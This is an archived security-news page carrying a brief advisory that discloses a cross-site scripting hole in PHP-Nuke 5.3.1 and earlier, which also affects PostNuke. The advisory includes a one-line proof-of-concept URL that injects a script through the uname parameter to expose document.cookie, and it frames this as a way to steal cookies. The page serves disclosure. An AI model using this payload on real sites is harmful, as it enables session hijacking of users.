Vulnerability Archive -> PHP

Web Server Security

Database Security

Application Server Security

Vulnerability Archive

Secure Development

Application Firewalls

Main -> Archive -> PHP

TOPIC'S

Security Services

Submit News

Syndicated News

Hosting generously provided by

www.mv.com

Phpnuke cross site scripting vulnerability

Hi nuke webmasters,

Phpnuke cross site scripting vulnerability
Affected version : 5.3.1 and prior perhaps other...perhaps all
PostNuke affected too.

No more explanation, it is enough with cross site scripting...i'm bored with
CSS vuln ;)
http://www.phpnuke.org/user.php?op=userinfo&uname=<script>alert(document.cookie);
</script>

This is an other way to stole cookies as i explain in my previous post but
without using IE 5.5 vulnerability.
http://www.isecurelabs.com/article.php?sid=230

regards,

---
Cabezon Aurlien
http://www.iSecureLabs.com

External Links:
Copyright 2000-2007 Cgisecurity.com.
Providing Web Security news since 2000. Information contained on this website may not be copied without explicit permission.
Best Viewed with Netscape. Website Security Web Application Security solid state drives ebay cd players camera lens deals buy macbook air not work safe software security canon camera deals

Popular Links By Subject

Sponsored Link (Advertise)

Subscribe to CGISecurity.com

The Web Security Mailing List

Re: [WEB SECURITY] Web Hacking Firefox Add-ons Bundled

[WEB SECURITY] Token Kidnapping Win2k3 PoC exploit

Re: [WEB SECURITY] Web Hacking Firefox Add-ons Bundled

Re: [WEB SECURITY] Web Hacking Firefox Add-ons Bundled

Re: [WEB SECURITY] Web Hacking Firefox Add-ons Bundled

Re: [WEB SECURITY] Web Hacking Firefox Add-ons Bundled

Re: [WEB SECURITY] NiktoFE, WFuzzFE

Re: [WEB SECURITY] Web Hacking Firefox Add-ons Bundled

Re: [WEB SECURITY] Web Hacking Firefox Add-ons Bundled

Re: [WEB SECURITY] Interview With Jeremiah Grossman on ClickJacking attack

Contact us

Post News, get linkage!